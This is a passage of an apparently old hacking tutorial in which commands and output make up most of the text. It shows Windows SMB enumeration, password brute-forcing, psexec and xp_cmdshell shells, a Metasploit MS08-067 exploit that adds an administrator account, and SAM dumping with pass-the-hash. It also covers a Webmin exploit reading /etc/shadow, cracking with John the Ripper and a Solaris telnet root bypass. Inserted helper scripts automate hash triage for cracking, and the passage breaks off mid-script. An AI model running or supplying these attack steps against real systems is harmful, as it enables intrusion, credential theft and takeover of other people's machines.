SF:(GetRequest,6,"\x18\xc1\n\0x\x01")%r(RTSPRequest,6,"\x18\xc1\n\0x\x01")
SF:%r(HTTPOptions,6,"\x18\xc1\n\0x\x01")%r(Help,6,"\x18\xc1\n\0x\x01")%r(S
SF:SLSessionReq,6,"\x18\xc1\n\0x\x01")%r(FourOhFourRequest,6,"\x18\xc1\n\0
SF:x\x01")%r(LPDString,6,"\x18\xc1\n\0x\x01")%r(SIPOptions,6,"\x18\xc1\n\0
SF:x\x01");
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.68 seconds

[End Result]------------------------------------------------------------------------------------

From the result we get the list of open ports, and we know that this system runs IIS, NetBIOS, the RPC endpoint mapper, SMB and MSSQL 2000, and that the operating system is Windows 2000 (we pick Windows 2000 as the example because we want you to see the big picture of Windows hacking). The next step is information gathering from NetBIOS and SMB. Windows 2000 allows "null sessions" (the holy grail of Windows enumeration), which let us enumerate all accounts on the system, including security policies, local groups and file shares. We use nmap's NSE scripts to gather the information. In the past we had to connect to the system through IPC$ (the null session) with the command [net use \\192.168.80.129\IPC$ "" /u:""] and then enumerate with a tool such as SuperScan4 or Winfo. Nowadays nmap (4.85BETA here) performs those tasks with the help of NSE scripts (smb-enum-users, smb-enum-shares, etc.).

[Nmap Result]-----------------------------------------------------------------------------------

bt nmap-4.85BETA10 # nmap --script=smb-enum-users 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:21 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:
| smb-enum-users:
|_ SERVER\Administrator, SERVER\backup, SERVER\epp, SERVER\epp_contractor, SERVER\Guest, SERVER\IUSR_SERVER, SERVER\IWAM_SERVER, SERVER\Jim, SERVER\John, SERVER\mary, SERVER\molly, SERVER\None, SERVER\TsInternetUser

Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds

[End Result]------------------------------------------------------------------------------------

From the result we know all the users on the target system:

- Administrator
- backup
- epp
- epp_contractor
- Guest
- IUSR_SERVER
- IWAM_SERVER
- Jim
- John
- mary
- molly
- TsInternetUser

Other techniques are enumeration through anonymous LDAP binds and through default SNMP community strings (public/private), which can also list all users of the target system:
"LDAP anonymous bind" => use ldapminer
"Default SNMP community string" => use snmpwalk
Shared files and folders are also important. If their permissions are not set properly, an attacker may be able to upload malicious files directly to the system.

[Nmap Result]-----------------------------------------------------------------------------------

bt nmap-4.85BETA10 # nmap --script=smb-enum-shares 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:21 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:
| smb-enum-shares:
| Anonymous shares: IPC$
|_ Restricted shares: COVERPG$, Fax$, Inetpub, scripts, ADMIN$, C$

Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds

[End Result]------------------------------------------------------------------------------------

From the result we know all the shares:
IPC$ << anonymous (null session)
COVERPG$
Fax$
Inetpub
scripts
ADMIN$
C$


Next, since we know all the users from the null session, we can brute-force their passwords with the NSE script "smb-brute":

[Nmap Result]-----------------------------------------------------------------------------------

bt nmap-4.85BETA10 # nmap --script=smb-brute 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:38 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:
| smb-brute:
| backup:pukcab => Login was successful
|_ epp:password => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds

[End Result]------------------------------------------------------------------------------------

Looking at the result, the brute force found weak passwords for the users backup and epp.



++++++++++++++++++++++++++
[0x01b] - Gaining Access
++++++++++++++++++++++++++


Now we have two account credentials to attack with. We choose "epp", whose password is "password", and use psexec (PsTools from Sysinternals)
to spawn a command shell on the target:


[Psexec Result]---------------------------------------------------------------------------------
C:\>psexec \\192.168.80.129 -u epp -p password -e cmd.exe

PsExec v1.71 - Execute processes remotely
Copyright (C) 2001-2006 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2

C:\WINNT\system32>net user

User accounts for \\SERVER

------------------------------------------------------------------------------
Administrator backup epp
epp_contractor Guest IUSR_SERVER
IWAM_SERVER Jim John
mary molly TsInternetUser
The command completed successfully.

[End Result]------------------------------------------------------------------------------------

From the result, we can spawn a command shell with epp's privileges (epp is a member of Administrators), and from there the rest is routine...

The target runs MSSQL 2000, so we guess that it uses the default MSSQL 2000 credentials (sa with a blank password). We then use osql to run commands through the MSSQL extended stored procedure
xp_cmdshell. This stored procedure is a gold mine for attackers, because it gives an interactive command shell on the database server; 'osql' is all the attacker needs to drive it:

[Osql Result]-----------------------------------------------------------------------------------
C:\>osql -S 192.168.80.129 -U sa -P "" -Q "exec master..xp_cmdshell 'dir c:\' "
output

------------------------------------------------------------------------------

-----------------------------------------------------------------------

-----------------------------------------------------------------------

--------------------------------
Volume in drive C has no label.

Volume Serial Number is 50C0-6A72

NULL

Directory of c:\

NULL

12/03/2004 04:39p 451 dir.txt
06/04/2004 03:49p Documents and Settings
19/03/2009 12:47a Inetpub
19/03/2009 12:38a Program Files
03/07/2009 04:55p WINNT
1 File(s) 451 bytes
4 Dir(s) 3,053,559,808 bytes free

NULL

C:\>osql -S 192.168.80.129 -U sa -P "" -Q "exec master..xp_cmdshell 'net user' "
output

------------------------------------------------------------------------------

-----------------------------------------------------------------------

-----------------------------------------------------------------------

--------------------------------

-----------------------------------------------------------------------------

Administrator backup cwh

epp epp_contractor Guest

IUSR_SERVER IWAM_SERVER Jim

John mary molly

TsInternetUser

or more errors.

NULL

NULL

[End Result]------------------------------------------------------------------------------------

Note: the Nmap script "ms-sql-info.nse" can also scan for machines whose 'sa' account has a blank password.

For the latest worms such as Conficker/Downadup, the Nmap script "smb-check-vulns" can scan both for the MS08-067 vulnerability and for systems already infected by the worm:

[Nmap Result]-----------------------------------------------------------------------------------

bt nmap-4.85BETA10 # nmap --script=smb-check-vulns 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:35 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
|_ Conficker: Likely CLEAN

Nmap done: 1 IP address (1 host up) scanned in 1.66 seconds

[End Result]------------------------------------------------------------------------------------

Now we know the target has the MS08-067 vulnerability, so we turn to the god of exploit suites => the "Metasploit Framework":

[Msf Console]-----------------------------------------------------------------------------------

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show targets
msf exploit(ms08_067_netapi) > set TARGET 1
TARGET => 1
msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_bind_tcp
PAYLOAD => generic/shell_bind_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.80.129
RHOST => 192.168.80.129
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.80.131:51038 -> 192.168.80.129:4444)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2

C:\WINNT\system32>net user cwh 1234 /add
net user cwh 1234 /add
The command completed successfully.

C:\WINNT\system32>net localgroup administrators cwh /add
net localgroup administrators cwh /add
The command completed successfully.

C:\WINNT\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator backup cwh
epp epp_contractor Guest
IUSR_SERVER IWAM_SERVER Jim
John mary molly
TsInternetUser
The command completed with one or more errors.

[End Msf]---------------------------------------------------------------------------------------

The most popular tool for scanning, enumeration and vulnerability assessment is Nessus (www.nessus.org). It has many features such as high-speed discovery,
configuration auditing, sensitive-data discovery and vulnerability analysis. Best of all, it's FREE !!!


++++++++++++++++++++++++++++++++
[0x01c] - Escalating Privilege
++++++++++++++++++++++++++++++++


The next step is to dump the SAM database from the target to get all the password hashes. Sure, we can use Nmap for that too !!
We can only read the SAM when we have administrator privileges (epp's account is in the Administrators group; note epp's RID of 500 in the output below, which marks it as the built-in Administrator account under another name):

[Nmap Result]-----------------------------------------------------------------------------------

bt nmap-4.85BETA10 # nmap --script=smb-pwdump --script-args=smbuser=epp,smbpass=password 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:50 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:
| smb-pwdump:
| Administrator:1010 => F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B
| backup:1005 => E84F09BA27610849AAD3B435B51404EE:94FF50F81F9885648A05438F63EA9F91
| epp:500 => E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
| epp_contractor:1007 => 60F898DDDCAE534EAAD3B435B51404EE:148301D12E96ED2CE24A20C6ED9A2EAF
| Guest:501 => A0E150C75A17008EAAD3B435B51404EE:823893ADFAD2CDA6E1A414F3EBDF58F7
| IUSR_SERVER:1001 => 0C2A09C60FF052D3518640B5D8EB223A:E9C4226B18D023A932473576E62EB5E9
| IWAM_SERVER:1002 => A373B0BEBCEED1FAD95379C32DAD5DEF:803F59A7EA1EA9A65A15310B58A015D3
| Jim:1009 => 209CA2D6E74286E9AAD3B435B51404EE:FF623167AECD14984A0A97E4D3989A89
| John:1004 => 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
| mary:1003 => 879980DE48006E7EAAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67
| molly:1008 => 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
|_ TsInternetUser:1000 => 52FE1A30EB33BA7BE3BB722E78963414:3A07E408DB9CB2331C9C527B0F4A8C52

Nmap done: 1 IP address (1 host up) scanned in 2.58 seconds

[End Result]------------------------------------------------------------------------------------

Now we have every hash from the target system. In the past we would have to crack the passwords with a tool such as Cain or rcrack
using a technique called "rainbow tables", but that steals our sleeping time. We can save that time with one of Nmap's features:
smb-brute accepts the gathered hashes in place of passwords and tries them, together with the list of usernames, against other machines. We do not need to pre-crack the hashes.

[Nmap Result]-----------------------------------------------------------------------------------

bt nmap-4.85BETA10 # cat password.txt
F703F386322B0662E72C57EF50F76A05
E52CAC67419A9A224A3B108F3FA6CB6D
209CA2D6E74286E9AAD3B435B51404EE
bt nmap-4.85BETA10 # nmap --script=smb-brute --script-args=userdb=usernames.txt,passdb=password.txt 192.168.80.1/24

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:50 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.100:
PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-brute:
|_ Administrator:F703F386322B0662E72C57EF50F76A05 => Login was successful

Interesting ports on 192.168.80.135:
PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-brute:
| epp:E52CAC67419A9A224A3B108F3FA6CB6D => Login was successful
|_ Jim:209CA2D6E74286E9AAD3B435B51404EE => Login was successful


[End Result]------------------------------------------------------------------------------------
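The password.txt above was typed in by hand from the dump. The script below is an added example (not part of the original article) that does that triage automatically from smb-pwdump output: it builds the userdb/passdb lists for smb-brute, points out which account carries RID 500 (the built-in Administrator, whatever it was renamed to: epp here), which LM hashes end in AAD3B435B51404EE (the LM hash of an empty half, meaning a password of seven characters or fewer) and which accounts share an NT hash (same password, so one crack or one pass covers all of them). The sample input is a subset of the dump above in nmap's exact format; the function names are my own.

```shell
#!/bin/bash
# Added example: triage nmap smb-pwdump output before cracking anything.

# LM hash of an empty 7-byte half. A password of 7 characters or fewer always
# produces this as the second half of its LM hash.
EMPTY_LM_HALF="AAD3B435B51404EE"

# Constructed sample: a subset of the smb-pwdump listing above, verbatim format.
pwdump_sample() {
    cat <<'EOF'
| smb-pwdump:
| Administrator:1010 => F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B
| epp:500 => E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
| John:1004 => 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
| molly:1008 => 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
|_ TsInternetUser:1000 => 52FE1A30EB33BA7BE3BB722E78963414:3A07E408DB9CB2331C9C527B0F4A8C52
EOF
}

# Turn "| user:RID => LM:NT" lines into "user RID LM NT"; non-matching lines
# (the "| smb-pwdump:" header) are dropped.
parse_pwdump() {
    sed -n 's/^|_\{0,1\} *\([^:]*\):\([0-9]*\) => \([0-9A-Fa-f]*\):\([0-9A-Fa-f]*\).*/\1 \2 \3 \4/p'
}

# userdb / passdb lists for smb-brute. passdb holds the LM hashes, exactly
# as the hand-made password.txt above did; smb-brute accepts them as passwords.
userdb() { parse_pwdump | awk '{print $1}'; }
passdb() { parse_pwdump | awk '{print $3}' | sort -u; }

# The real built-in Administrator is RID 500, regardless of its current name.
builtin_admin() { parse_pwdump | awk '$2 == 500 {print $1}'; }

# Accounts whose LM hash ends in the empty half: password is 7 chars or fewer.
short_passwords() {
    parse_pwdump | awk -v e="$EMPTY_LM_HALF" 'toupper(substr($3, 17, 16)) == e {print $1}'
}

# Accounts that share an identical NT hash: they use the same password.
reused_hashes() {
    parse_pwdump | awk '{ users[$4] = users[$4] " " $1; n[$4]++ }
                        END { for (h in n) if (n[h] > 1) print h ":" users[h] }'
}

# Usage on a real dump saved from nmap:
#   userdb < dump.txt > usernames.txt
#   passdb < dump.txt > password.txt
#   short_passwords < dump.txt   # worth cracking first, the keyspace is tiny
```

The two list files are then passed exactly as in the smb-brute command above (--script-args=userdb=usernames.txt,passdb=password.txt). The short-password and reuse checks cost nothing and decide where any cracking time is best spent.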


Now we can compromise other systems on the network that use the same password (the hash itself, with no cracking), using Passing the Hash with the patched SMB suite (http://foofus.net/jmk/passhash.html)
to impersonate a user without knowing the password. I use samba-3.0.22 with the foofus pass-the-hash patch applied (patch -p0) and built with:

./configure --with-smbmount
[SMB Hash]--------------------------------------------------------------------------------------

bt cwh # export SMBHASH="F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B"
bt cwh # ./smbmount //192.168.80.129/c$ /mnt/passhash -o username=administrator
Password: << Insert hash from SMBHASH (F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B)
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied LM HASH...
bt cwh # ls /mnt/passhash/
dir.txt Documents and Settings Inetpub Program Files WINNT
bt cwh #

[End Result]------------------------------------------------------------------------------------

Another tool is the Pass-The-Hash Toolkit (http://oss.coresecurity.com/projects/pshtoolkit.html), which also impersonates a user without the password. The Pass-The-Hash Toolkit contains utilities to manipulate the Windows logon sessions
maintained by the LSA (Local Security Authority) component. These tools let you list the current logon sessions with their corresponding NTLM credentials (e.g. users remotely logged in through Remote Desktop/Terminal Services),
and also change at runtime the current username, domain name and NTLM hashes (YES, PASS-THE-HASH on Windows!).

We first need to compromise one machine in order to attack other machines that use the same credentials. Now that we have a command shell on it, we use "whosthere" to find the credentials held in its logon sessions:

[Victim Result]---------------------------------------------------------------------------------

C:\pshtoolkit_v1.4\whosthere>whosthere
WHOSTHERE v1.4 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies
This tool lists the active LSA logon sessions with NTLM credentials.
(use -h for help).
-B is now used by default. Trying to find correct addresses..Found!.
the output format is: username:domain:lmhash:nthash

cwh:SERVER:00000000000000000000000000000000:8846F7EAEE8FB117AD06BDD830B7586C
Administrator:SERVER2:209CA2D6E74286E9AAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67

C:\pshtoolkit_v1.4\whosthere>cd ..\iam
C:\pshtoolkit_v1.4\iam>iam.exe -r cmd.exe -h Administrator:SERVER2:209CA2D6E74286E9AAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67 -B
IAM v1.4 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies
Parameters:
Username: Administrator
Domainname: SERVER2
LM hash: 209CA2D6E74286E9AAD3B435B51404EE
NT hash: BA69764BCCF8F41121E0B3046CE46C67
Run: cmd.exe
LSASRV.DLL version: 00050001h. A280DC0h
Checking LSASRV.DLL....skipped. (-B was specified).
Trying to obtain addresses...Ok! (AC = 75753BA0, EM = 7573FDEC)
The current logon credentials were successful changed!

[End Result]------------------------------------------------------------------------------------

Now we have the Administrator credentials loaded into the new command prompt, which may let us compromise many more machines on the network !!



#######################################
[0x02] - The Art of Unix/Linux Attack
#######################################



++++++++++++++++++++++++++++++++++
[0x02a] - Scanning & Enumeration
++++++++++++++++++++++++++++++++++

The most important thing before you start hacking is to gather as much information as you can.
You can use that information to guess passwords, to pick specific points to attack, or for anything else
you can imagine. Our favourite tool for scanning a target is nmap. We learn the open ports and
the software versions with just one command. We show you below :D

[Nmap Result]-----------------------------------------------------------------------------------

bt cwh # nmap -sV www.target.com

Starting Nmap 4.76 ( http://nmap.org ) at 2009-07-03 16:38 SE Asia Standard Time

Interesting ports on 192.168.0.111:
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.6
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
25/tcp open smtp Cisco PIX sanitized smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.3 mod_ssl/2.2.8 OpenSSL/0.9.8g)
111/tcp filtered rpcbind
443/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.3 mod_ssl/2.2.8 OpenSSL/0.9.8g)
554/tcp filtered rtsp
1720/tcp filtered H.323/Q.931
2000/tcp filtered callbook
3306/tcp open mysql MySQL (unauthorized)
5060/tcp filtered sip
10000/tcp open http Webmin httpd
Service Info: OSs: Unix, Linux; Device: firewall

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds

[End Result]------------------------------------------------------------------------------------


In the result you see that this system runs Webmin, but we do not know the exact version.
If we are not suffering from Alzheimer's, we remember that Webmin versions before 1.290 had an arbitrary file disclosure vulnerability.
We search milw0rm.com and, bingo!!, we find one at http://milw0rm.com/exploits/2017 .
It is a Perl exploit script, so we download it, save it as 2017.pl and launch the command ...

[Perl Script Result]----------------------------------------------------------------------------

bt cwh # perl 2017.pl www.target.com 10000 http /etc/passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
snort:x:1000:102::/home/snort:/bin/false
user1:x:1001:100::/home/user1:

[End Perl Script Result]------------------------------------------------------------------------

lol !!! It seems that the admin is behind the times. She does not update or patch her Webmin.


++++++++++++++++++++++++++
[0x02b] - Gaining Access
++++++++++++++++++++++++++

As the target is a Linux server, it is harder to attack remotely than a Windows server.
Most remote exploits affecting Linux are against third-party software such as the
FTP, SSH or web server. The ways into a Linux server are to exploit a vulnerable third-party
service, to harvest user information from a web application vulnerability and then
brute-force the accounts, or to social-engineer a valid user.

In our example case, we highly recommend you try the following command:

bt cwh # perl 2017.pl www.target.com 10000 http /etc/shadow

This command tries to read the /etc/shadow file (Webmin runs as root, so the file disclosure can read it). If the result looks like the one below, you are lucky ;D

[Perl Script Result]----------------------------------------------------------------------------

root:$1$MKy0eqPM$auerQwMpGYcqgBqDddkfO/:13666:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
apache:*:9797:0:::::
messagebus:*:9797:0:::::
haldaemon:*:9797:0:::::
nobody:*:9797:0:::::
snort:!:13986:0:99999:7:::
user1:$1$RY88JSH8$1A73wdGEerLFulLzzTnHX0:14428:0:99999:7:::

[End Perl Script Result]------------------------------------------------------------------------


We put the result in the file shadow.txt and then try to crack the passwords with John the Ripper
(dict.lst is the dictionary file):

[John Result]-----------------------------------------------------------------------------------

bt cwh # john --wordlist=dict.lst shadow.txt
Loaded 2 password hashes with 2 different salts (FreeBSD MD5 [32/32])
user1 (user1)
guesses: 1 time: 0:00:00:00 100% c/s: 150 trying: abc

[End John Result]-------------------------------------------------------------------------------


This means the password of user1 is "user1"; root's password was not found in the dictionary.
Now you can log in to the target system with user1's credentials.
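Before feeding a stolen shadow file to John, it pays to look at what is actually in it. The script below is an added example, not part of the original article: it classifies each shadow entry by its crypt(3) prefix (here $1$ is MD5-crypt, which is why John reported "FreeBSD MD5"), separates locked and passwordless accounts from real hashes, and emits only the crackable lines so John's load reflects what is really worth cracking. The sample lines are constructed in the same format as the dump above; the "legacy" DES-crypt entry is made up purely to exercise that branch, and the function names are my own.

```shell
#!/bin/bash
# Added example: triage /etc/shadow entries before cracking.

# Constructed sample in /etc/shadow format (first four lines mirror the dump
# above; "legacy" is a made-up 13-character DES-crypt entry).
shadow_sample() {
    cat <<'EOF'
root:$1$MKy0eqPM$auerQwMpGYcqgBqDddkfO/:13666:0:::::
bin:*:9797:0:::::
snort:!:13986:0:99999:7:::
user1:$1$RY88JSH8$1A73wdGEerLFulLzzTnHX0:14428:0:99999:7:::
legacy:AbJnggxhB/yWI:14428:0:99999:7:::
EOF
}

# Name the hash scheme from the crypt(3) prefix of a shadow password field.
hash_kind() {
    case "$1" in
        '')                      echo nopassword ;;   # empty field: no password asked at all
        '!'*|'*'*)               echo locked ;;       # "*", "!", "!!" or a hash disabled with "!"
        '$1$'*)                  echo md5crypt ;;     # "FreeBSD MD5" in old John output
        '$2a$'*|'$2b$'*|'$2y$'*) echo bcrypt ;;
        '$5$'*)                  echo sha256crypt ;;
        '$6$'*)                  echo sha512crypt ;;
        *) if [ "${#1}" -eq 13 ]; then echo descrypt; else echo unknown; fi ;;  # DES: only 8 chars matter
    esac
}

# Print "user kind" for every entry on stdin.
classify_shadow() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        user=${line%%:*}
        rest=${line#*:}
        hash=${rest%%:*}
        echo "$user $(hash_kind "$hash")"
    done
}

# Pass through only the entries John can load; locked, passwordless and
# unrecognised fields are dropped so they do not inflate the hash count.
crackable_shadow() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        rest=${line#*:}
        case "$(hash_kind "${rest%%:*}")" in
            locked|nopassword|unknown) ;;
            *) printf '%s\n' "$line" ;;
        esac
    done
}

# Usage on a real capture:
#   classify_shadow < shadow.txt
#   crackable_shadow < shadow.txt > crackable.txt && john --wordlist=dict.lst crackable.txt
```

A "nopassword" result deserves attention before any cracking starts: that account logs in with an empty password. A "descrypt" result means the effective password is at most eight characters, which changes the cracking budget entirely.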

Once you have found a way into the system, you have to figure out a way to escalate
your privileges.

We have another example to show you: the telnet vulnerability on Solaris 10/11.
It lets you log in directly with root privileges. We just send
[telnet -l "-froot" 192.168.0.112] to the telnet daemon on Solaris 10/11; the "-froot" is passed
straight through to /bin/login as its -f (pre-authenticated) option, so no password is asked for.

[Telnet bypass]---------------------------------------------------------------------------------

bt cwh # telnet -l "-froot" 192.168.0.112
Trying 192.168.0.112...
Connected to 192.168.0.112.
Escape character is '^]'.
Last login: Sun Jun 30 02:02:02 from 192.168.0.2
Sun Microsystems Inc. SunOS 5.10 Generic January 2007
# id
uid=0(root) gid=0(root)
#

[End Result]------------------------------------------------------------------------------------

If we use this technique, we do not need to escalate privileges, because we are already
logged in as root.


++++++++++++++++++++++++++++++++
[0x02c] - Escalating Privilege
++++++++++++++++++++++++++++++++

In this article we introduce you to local root exploits for Linux. You can find
them on milw0rm.com. The first tasks after getting access to the system are to check
the Linux kernel version and your user id:

user1@linuxserver:~$ uname -a
Linux linuxserver 2.6.17-10-server #2 SMP Fri Oct 13 18:47:26 UTC 2006 i686 GNU/Linux
user1@linuxserver:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)

From the result of the two commands above, we want to escalate our privilege to root, and
we remember that there is a local root exploit for Linux 2.6.17 - 2.6.24 on milw0rm.com ;D
We do not hesitate to download the code, compile it and run it. The result is shown below ...
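The version check above was done by eye. As an added example (not from the original article), the helper below compares the numeric part of uname -r against an exploit's stated range so the decision is mechanical and repeatable on any box you land on. The 2.6.17 - 2.6.24 bounds are the ones quoted above; note that a patch-level suffix counts in the comparison, so if the exploit header you downloaded states a bound such as 2.6.24.1, pass exactly that. Function names are my own.

```shell
#!/bin/bash
# Added example: is the running kernel inside an exploit's claimed version range?

# Reduce a uname -r string to its numeric dotted prefix:
# "2.6.17-10-server" -> "2.6.17", "2.6.24.1" -> "2.6.24.1"
kernel_numeric() {
    printf '%s\n' "$1" | sed 's/^\([0-9][0-9.]*\).*/\1/; s/\.$//'
}

# Compare two dotted versions component by component; prints -1, 0 or 1.
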